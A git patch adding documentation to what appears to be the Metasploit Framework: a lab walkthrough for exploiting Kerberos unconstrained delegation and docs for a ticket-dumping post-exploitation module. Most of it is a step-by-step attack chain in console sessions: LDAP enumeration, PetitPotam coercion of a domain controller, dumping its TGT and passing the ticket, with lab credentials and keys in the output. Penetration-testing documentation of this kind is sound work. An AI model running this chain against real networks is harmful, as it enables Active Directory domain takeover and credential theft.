From 54bce7fcb58039d7c367386f895d24a4b400a00f Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Wed, 23 Aug 2023 08:43:55 -0400
Subject: [PATCH] Add module docs
---
.../ldap_query/ldap_queries_default.yaml | 2 +-
.../kerberos/unconstrained_delegation.md | 226 ++++++++++
docs/navigation.rb | 6 +-
.../post/windows/manage/kerberos_tickets.md | 405 ++++++++++++++++++
.../post/windows/manage/kerberos_tickets.rb | 3 +
5 files changed, 640 insertions(+), 2 deletions(-)
create mode 100644 docs/metasploit-framework.wiki/kerberos/unconstrained_delegation.md
create mode 100644 documentation/modules/post/windows/manage/kerberos_tickets.md
diff --git a/data/auxiliary/gather/ldap_query/ldap_queries_default.yaml b/data/auxiliary/gather/ldap_query/ldap_queries_default.yaml
index 483ec73522..075ead2477 100644
--- a/data/auxiliary/gather/ldap_query/ldap_queries_default.yaml
+++ b/data/auxiliary/gather/ldap_query/ldap_queries_default.yaml
@@ -292,7 +292,7 @@ queries:
 references:
 - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
 - action: ENUM_UNCONSTRAINED_DELEGATION
- description: 'Dump info about all known objects that allow uncontrained delegation.'
+ description: 'Dump info about all known objects that allow unconstrained delegation.'
 filter: '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
 attributes:
 - cn
diff --git a/docs/metasploit-framework.wiki/kerberos/unconstrained_delegation.md b/docs/metasploit-framework.wiki/kerberos/unconstrained_delegation.md
new file mode 100644
index 0000000000..4f08ab0540
--- /dev/null
+++ b/docs/metasploit-framework.wiki/kerberos/unconstrained_delegation.md
@@ -0,0 +1,226 @@
+# Unconstrained Delegation Exploitation
+
+If a computer account is configured for unconstrained delegation, and an attacker has administrative access to it then
+the attacker can leverage it to compromise the Active Directory domain.
+
+## Lab setup
+
+For this attack to work there must be a computer account (workstation or server) in the active directory domain that has
+been configured for unconstrained delegation.
+
+On the domain controller:
+
+1. Open "Active Directory Users and Computers"
+2. Navigate to the computer account, right click and select "Properties"
+3. In the "Delegation" tab, select "Trust this computer for delegation to any service (Kerberos only)"
+
+On the target computer:
+
+1. Force an update of group policy by running `gpupdate /force`
+2. Reboot the computer
+
+## Attack Workflow
+
+This attack assumes that the attacker has:
+
+1. The IP address of the domain controller.
+2. The active directory domain name.
+3. A compromised domain account (no special privileges are necessary).
+4. The ability to fully compromise a target system through some means.
+5. (Optional but recommended) Metasploit running with an attached database so the Kerberos ticket cache can be used.
+ Verify this using `db_status` command.
+
+At a high-level the summary to leverage this attack chain is:
+
+1. Identify a target computer account configured with unconstrained delegation.
+2. Compromise that target computer account to open a Meterpreter session with administrative privileges (SYSTEM works).
+3. Coerce authentication to the compromised target from a domain controller.
+4. Dump the Kerberos tickets from the compromised targets to obtain a TGT from the domain controller's computer account.
+5. Use the TGT to authenticate to the domain controller as itself (the computer account).
+
+### Target Identification
+The unconstrained delegation setting is stored as a bit flag in the `userAccountControl` LDAP attribute. 
A domain +account can be used with the `auxiliary/gather/ldap_query` module to identify computer accounts configured for +unconstrained delegation. Note that by default domain controllers themselves are configured for unconstrained delegation +and should be ignored as targets. + +Use the `ENUM_UNCONSTRAINED_DELEGATION` action to enumerate targets: +``` +msf6 > use auxiliary/gather/ldap_query +msf6 auxiliary(gather/ldap_query) > set RHOSTS 192.168.159.10 +RHOSTS => 192.168.159.10 +msf6 auxiliary(gather/ldap_query) > set DOMAIN msflab.local +DOMAIN => msflab.local +msf6 auxiliary(gather/ldap_query) > set USERNAME aliddle +USERNAME => aliddle +msf6 auxiliary(gather/ldap_query) > set PASSWORD Password1! +PASSWORD => Password1! +msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_UNCONSTRAINED_DELEGATION +ACTION => ENUM_UNCONSTRAINED_DELEGATION +msf6 auxiliary(gather/ldap_query) > run +[*] Running module against 192.168.159.10 + +[*] Discovering base DN automatically +[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local +[+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local +CN=WS01 CN=Computers DC=msflab DC=local +======================================= + + Name Attributes + ---- ---------- + cn WS01 + objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local + samaccountname WS01$ + +CN=DC OU=Domain Controllers DC=msflab DC=local +============================================== + + Name Attributes + ---- ---------- + cn DC + memberof CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=msflab,DC=local || CN=Cert Publishers,CN=Users,DC=msflab,DC=local + objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local + samaccountname DC$ + +[*] Auxiliary module execution completed +msf6 auxiliary(gather/ldap_query) > +``` + +This results in two potential targets, WS01 and DC. Next, use the `ENUM_DOMAIN_CONTROLLERS` action to identify the +domain controllers to remove from the list of potential targets. 
+ +``` +msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_DOMAIN_CONTROLLERS +ACTION => ENUM_DOMAIN_CONTROLLERS +msf6 auxiliary(gather/ldap_query) > run +[*] Running module against 192.168.159.10 + +[*] Discovering base DN automatically +[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local +[+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local +CN=DC OU=Domain Controllers DC=msflab DC=local +============================================== + + Name Attributes + ---- ---------- + distinguishedname CN=DC,OU=Domain Controllers,DC=msflab,DC=local + dnshostname DC.msflab.local + name DC + operatingsystem Windows Server 2019 Standard + operatingsystemversion 10.0 (17763) + +[*] Auxiliary module execution completed +msf6 auxiliary(gather/ldap_query) > +``` + +This show that DC is a domain controller and should be removed from the list, leaving WS01 as the only viable target. + +### Exploitation +Now the WS01 system needs to be compromised through some means to obtain a Meterpreter session. Once a Meterpreter +session has been obtained, the Domain Controller needs to be coerced into authenticating to the target. The +`auxiliary/scanner/dcerpc/petitpotam` module can be used for this purpose. Use the module, and take care to set the +`LISTENER` option to **the hostname of the compromised host**. The hostname must be used and not an IP address. Set the +remaining options including `RHOSTS` to the domain controller, and `SMBUser` / `SMBPass` to the credentials of the +compromised domain account. + +``` +msf6 > use auxiliary/scanner/dcerpc/petitpotam +msf6 auxiliary(scanner/dcerpc/petitpotam) > set LISTENER ws01.msflab.local +LISTENER => ws01.msflab.local +msf6 auxiliary(scanner/dcerpc/petitpotam) > set SMBUser aliddle +SMBUser => aliddle +msf6 auxiliary(scanner/dcerpc/petitpotam) > set SMBPass Password1! +SMBPass => Password1! 
+msf6 auxiliary(scanner/dcerpc/petitpotam) > set RHOSTS 192.168.159.10 +RHOSTS => 192.168.159.10 +msf6 auxiliary(scanner/dcerpc/petitpotam) > run + +[+] 192.168.159.10:445 - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful +[*] 192.168.159.10:445 - Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf6 auxiliary(scanner/dcerpc/petitpotam) > +``` + +If the module does not indicate that the attack was successful, another tool like +[`Coercer`](https://github.com/p0dalirius/Coercer) can be used to try additional methods. + +Now that the domain controller has authenticated to the target it's necessary to dump the kerberos tickets from the +compromised target. Use the `post/windows/manage/kerberos_tickets` module and the `DUMP_TICKETS` action to dump the TGTs +from the compromised host. If the attack was successful there should be at least one TGT from the domain controller's +computer account. + +``` +msf6 > use post/windows/manage/kerberos_tickets +msf6 post(windows/manage/kerberos_tickets) > set SESSION -1 +SESSION => -1 +msf6 post(windows/manage/kerberos_tickets) > set SERVICE krbtgt/* +SERVICE => krbtgt/* +msf6 post(windows/manage/kerberos_tickets) > run + +[*] LSA Handle: 0x000001efe1c415a0 +[*] LogonSession LUID: 0x00004bc1d +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:33:17 -0400 +[*] Ticket[0] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823151727_default_192.168.159.10_mit.kerberos.cca_488233.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0 + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE) 
+ Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 08:33:17 -0400 + End time: 2023-08-23 18:33:17 -0400 + Renew Till: 2023-08-30 08:33:17 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + 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 +[*] LogonSession LUID: 0x00001052b +[*] User: Window Manager\DWM-1 +[*] Session: 1 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:38 -0400 + +... omitted for brevity ... +``` + +In this case, a TGT for the `MSFLAB\DC$` account was obtained through the logon session with LUID `0x00004bc1d`. The +ticket was stored to disk in a ccache file. The ticket can also be seen in the output of `klist`. + +``` +msf6 post(windows/manage/kerberos_tickets) > klist +Kerberos Cache +============== +id host principal sname issued status path +-- ---- --------- ----- ------ ------ ---- +411 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823151744_default_192.168.159.10_mit.kerberos.cca_307418.bin +407 192.168.159.10 WS01$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 15:14:46 -0400 active /home/smcintyre/.msf4/loot/20230823151735_default_192.168.159.10_mit.kerberos.cca_760842.bin + +msf6 post(windows/manage/kerberos_tickets) > +``` + +### Using The Ticket +Now that at TGT for the domain controller has been obtained, it can be used in a Pass-The-Ticket style attack whereby +the attacker uses it to authenticate to the target. The `auxiliary/gather/windows_secrets_dump` module is a good one to +use for this purpose as it will yield additional accounts while avoiding running any kind of payload on the domain +controller. diff --git a/docs/navigation.rb b/docs/navigation.rb index 00b5eb1d5f..99ff61e26c 100644 
--- a/docs/navigation.rb
+++ b/docs/navigation.rb
@@ -186,7 +186,11 @@ NAVIGATION_CONFIG = [
 },
 {
 path: '../../documentation/modules/auxiliary/admin/ldap/rbcd.md',
- title: 'RBCD - Resource-based constrained delegation'
+ title: 'Resource-based constrained delegation (RBCD)'
+ },
+ {
+ path: 'kerberos/unconstrained_delegation.md',
+ title: 'Unconstrained delegation'
 }
 ]
 },
diff --git a/documentation/modules/post/windows/manage/kerberos_tickets.md b/documentation/modules/post/windows/manage/kerberos_tickets.md
new file mode 100644
index 0000000000..af1d962d0a
--- /dev/null
+++ b/documentation/modules/post/windows/manage/kerberos_tickets.md
@@ -0,0 +1,405 @@
+Manage kerberos tickets on a compromised host. Different actions are available for different tasks. Kerberos tickets are
+associated with logon sessions which can be enumerated with the `ENUM_LUIDS` action. s
+
+## Options
+
+### LUID
+An optional logon session LUID to target in the DUMP_TICKETS and SHOW_LUID actions. The LUID is expressed in hex, e.g.
+`0x11223344`.
+
+### SERVICE
+An optional service name wildcard to target in the DUMP_TICKETS action. This option accepts wild cards. For example, to
+dump only TGTs use `krbtgt/*` and to only dump tickets for dc.msflab.local, use `*/dc.msflab.local`. Wildcards and
+service names are case insensitive.
+
+## Actions
+
+### DUMP_TICKETS
+This action allows dumping kerberos tickets from a compromised host. These tickets are loaded into Metasploit's
+kerberos ticket cache when Metasploit is connected to a database. If the Meterpreter session is running with
+administrative privileges, then the tickets from all logon sessions can be dumped. If the Meterpreter session is not
+running with Administrative privileges then only the tickets from the current logon session / current user can be
+dumped. If the `LUID` option is set then only the tickets from that logon session will be dumped. Targeting a specific
+LUID with the `LUID` option requires administrative privileges.
+
+### ENUM_LUIDS
+This action will enumerate the LUIDs of all active logon sessions. Some basic information is printed for each LUID.
+
+### SHOW_LUID
+This action will show the LUID and some basic information about the current logon session unless the `LUID` option is
+set in which case that logon session is shown.
+
+## Scenarios
+
+In this case the operator lists the currently cached Kerberos tickets in the Metasploit database. After that the
+`DUMP_TICKETS` action is used with a service filter to dump the TGTs on the compromised host. Finally, the `klist`
+command is used again to show the newly added TGTs. 
+ +``` +msf6 post(windows/manage/kerberos_tickets) > klist +Kerberos Cache +============== +No tickets + +msf6 post(windows/manage/kerberos_tickets) > run SESSION=-1 SERVICE=krbtgt/* + +[*] LSA Handle: 0x000001efe1bf7270 +[*] LogonSession LUID: 0x00004bc1d +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:33:17 -0400 +[*] Ticket[0] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135453_default_192.168.159.10_mit.kerberos.cca_948767.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0 + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 08:33:17 -0400 + End time: 2023-08-23 18:33:17 -0400 + Renew Till: 2023-08-30 08:33:17 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + 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 +[*] LogonSession LUID: 0x00001052b +[*] User: Window Manager\DWM-1 +[*] Session: 1 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:38 -0400 +[*] LogonSession LUID: 0x00000aa83 +[*] User: \ +[*] Session: 0 +[*] AuthenticationPackage: NTLM +[*] LogonType: UndefinedLogonType (0) +[*] LogonTime: 2023-08-23 08:32:27 -0400 +[-] Failed to call the authentication package. LsaCallAuthenticationPackage authentication package failed with: (0x00000520) ERROR_NO_SUCH_LOGON_SESSION: A specified logon session does not exist. It may already have been terminated. 
+[*] LogonSession LUID: 0x0000ae359 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:38:08 -0400 +[*] LogonSession LUID: 0x0000ae2d3 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:38:08 -0400 +[*] LogonSession LUID: 0x00004fff8 +[*] User: MSFLAB\smcintyre +[*] Session: 1 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:33:18 -0400 +[*] LogonSession LUID: 0x00004b823 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:33:17 -0400 +[*] LogonSession LUID: 0x00000b7c4 +[*] User: Font Driver Host\UMFD-0 +[*] Session: 0 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:37 -0400 +[*] LogonSession LUID: 0x0001f3e4f +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 09:42:34 -0400 +[*] Ticket[0] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135459_default_192.168.159.10_mit.kerberos.cca_126280.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0 + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 08:33:17 -0400 + End time: 2023-08-23 18:33:17 -0400 + Renew Till: 2023-08-30 08:33:17 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + 
Key Version Number: 2 + Cipher: + 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 +[*] LogonSession LUID: 0x0001243b3 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:47:47 -0400 +[*] LogonSession LUID: 0x0000003e5 +[*] User: NT AUTHORITY\LOCAL SERVICE +[*] Session: 0 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Service (5) +[*] LogonTime: 2023-08-23 08:32:38 -0400 +[*] LogonSession LUID: 0x0000ae390 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:38:08 -0400 +[*] LogonSession LUID: 0x0000ae320 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:38:08 -0400 +[*] LogonSession LUID: 0x00000b7be +[*] User: Font Driver Host\UMFD-1 +[*] Session: 1 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:37 -0400 +[*] LogonSession LUID: 0x00000b76e +[*] User: Font Driver Host\UMFD-0 +[*] Session: 0 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:37 -0400 +[*] LogonSession LUID: 0x0000104e9 +[*] User: Window Manager\DWM-1 +[*] Session: 1 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:38 -0400 +[*] LogonSession LUID: 0x00000b77b +[*] User: Font Driver Host\UMFD-1 +[*] Session: 1 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:32:37 -0400 +[*] LogonSession LUID: 0x0000003e7 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Negotiate +[*] LogonType: UndefinedLogonType (0) +[*] LogonTime: 2023-08-23 08:32:26 -0400 +[*] Ticket[0] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_341258.bin + Primary Principal: 
DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: 810290bb8e930190000e05de7abee1f095bfe29527cca5ad9320cf3d86260f08 + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 08:33:17 -0400 + End time: 2023-08-23 18:33:17 -0400 + Renew Till: 2023-08-30 08:33:17 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + 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 +[*] Ticket[1] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_389858.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: 810290bb8e930190000e05de7abee1f095bfe29527cca5ad9320cf3d86260f08 + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 08:33:17 -0400 + End time: 2023-08-23 18:33:17 -0400 + Renew Till: 2023-08-30 08:33:17 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + 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 +[*] LogonSession LUID: 0x0000003e4 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Negotiate +[*] LogonType: Service (5) +[*] LogonTime: 2023-08-23 08:32:37 -0400 +[*] Ticket[0] +[*] TGT MIT Credential Cache 
ticket saved to /home/smcintyre/.msf4/loot/20230823135507_default_192.168.159.10_mit.kerberos.cca_909298.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: b5c64f9aa85e1e31c9b17a28093bb39de235beeca53d844e10bbf4764cf7402e + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 09:32:46 -0400 + End time: 2023-08-23 19:32:46 -0400 + Renew Till: 2023-08-30 09:32:46 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + 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 +[*] Ticket[1] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135508_default_192.168.159.10_mit.kerberos.cca_938606.bin + Primary Principal: DC$@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: DC$@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: b5c64f9aa85e1e31c9b17a28093bb39de235beeca53d844e10bbf4764cf7402e + Subkey: false + Ticket Length: 1006 + Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 09:32:46 -0400 + End time: 2023-08-23 19:32:46 -0400 + Renew Till: 2023-08-30 09:32:46 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + 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 +[*] LogonSession LUID: 0x00004ff91 +[*] User: MSFLAB\smcintyre +[*] Session: 1 +[*] 
AuthenticationPackage: Kerberos +[*] LogonType: Interactive (2) +[*] LogonTime: 2023-08-23 08:33:18 -0400 +[*] Ticket[0] +[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135509_default_192.168.159.10_mit.kerberos.cca_783228.bin + Primary Principal: smcintyre@MSFLAB.LOCAL + Ccache version: 4 + + Creds: 1 + Credential[0]: + Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL + Client: smcintyre@MSFLAB.LOCAL + Ticket etype: 18 (AES256) + Key: 074bf82534302378dd8d8f911ddab2afbf64b32e8093e4fdd833e683e427c361 + Subkey: false + Ticket Length: 1052 + Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE) + Addresses: 0 + Authdatas: 0 + Times: + Auth time: 1969-12-31 19:00:00 -0500 + Start time: 2023-08-23 08:33:18 -0400 + End time: 2023-08-23 18:33:18 -0400 + Renew Till: 2023-08-30 08:33:18 -0400 + Ticket: + Ticket Version Number: 5 + Realm: MSFLAB.LOCAL + Server Name: krbtgt/MSFLAB.LOCAL + Encrypted Ticket Part: + Ticket etype: 18 (AES256) + Key Version Number: 2 + Cipher: + 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 +[*] LogonSession LUID: 0x00004d345 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:33:18 -0400 +[*] LogonSession LUID: 0x00004bfb9 +[*] User: MSFLAB\DC$ +[*] Session: 0 +[*] AuthenticationPackage: Kerberos +[*] LogonType: Network (3) +[*] LogonTime: 2023-08-23 08:33:17 -0400 +[*] Post module execution completed +msf6 post(windows/manage/kerberos_tickets) > klist +Kerberos Cache +============== +id host principal sname issued status path +-- ---- --------- ----- ------ ------ ---- +398 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135453_default_192.168.159.10_mit.kerberos.cca_948767.bin +399 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active 
/home/smcintyre/.msf4/loot/20230823135459_default_192.168.159.10_mit.kerberos.cca_126280.bin
+400 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_341258.bin
+401 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_389858.bin
+404 192.168.159.10 smcintyre@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:18 -0400 active /home/smcintyre/.msf4/loot/20230823135509_default_192.168.159.10_mit.kerberos.cca_783228.bin
+402 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823135507_default_192.168.159.10_mit.kerberos.cca_909298.bin
+403 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823135508_default_192.168.159.10_mit.kerberos.cca_938606.bin
+
+msf6 post(windows/manage/kerberos_tickets) >
+```
diff --git a/modules/post/windows/manage/kerberos_tickets.rb b/modules/post/windows/manage/kerberos_tickets.rb
index ea768f65c3..7f426bafc2 100644
--- a/modules/post/windows/manage/kerberos_tickets.rb
+++ b/modules/post/windows/manage/kerberos_tickets.rb
@@ -38,6 +38,7 @@ class MetasploitModule < Msf::Post
 info,
 'Name' => 'Kerberos Ticket Management',
 'Description' => %q{
+ Manage kerberos tickets on a compromised host.
 },
 'License' => MSF_LICENSE,
 'Author' => [
@@ -278,6 +279,8 @@ class MetasploitModule < Msf::Post
 def print_logon_session_summary(logon_session_data_ptr, annotation: nil)
 sid = '???'
 if datastore['VERBOSE'] && logon_session_data_ptr.contents.psid != 0
+ # reading the SID requires 3 railgun calls so only do it in verbose mode to speed things up
+ # reading the data directly wouldn't be much faster because SIDs are of a variable length
 result = session.railgun.advapi32.ConvertSidToStringSidA(logon_session_data_ptr.contents.psid.to_i, 4)
 if result
 sid = session.railgun.util.read_string(result['StringSid'])
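Review bot: The string that ConvertSidToStringSidA hands back is allocated by the Win32 API and, per its documented contract, has to be released with LocalFree; nothing in this hunk frees `result['StringSid']` after the `read_string` call, so unless that happens further down in print_logon_session_summary (the method continues past the hunk) every verbose pass over a logon session leaks a small allocation inside the target process. If it is not already freed, a `session.railgun.kernel32.LocalFree(result['StringSid'])` directly after the read would close it. The new comment's "requires 3 railgun calls" claim cannot be checked from the two calls visible here; naming the calls it counts (ConvertSidToStringSidA, read_string, and the LocalFree if present) would make the comment verifiable and document where the buffer is released.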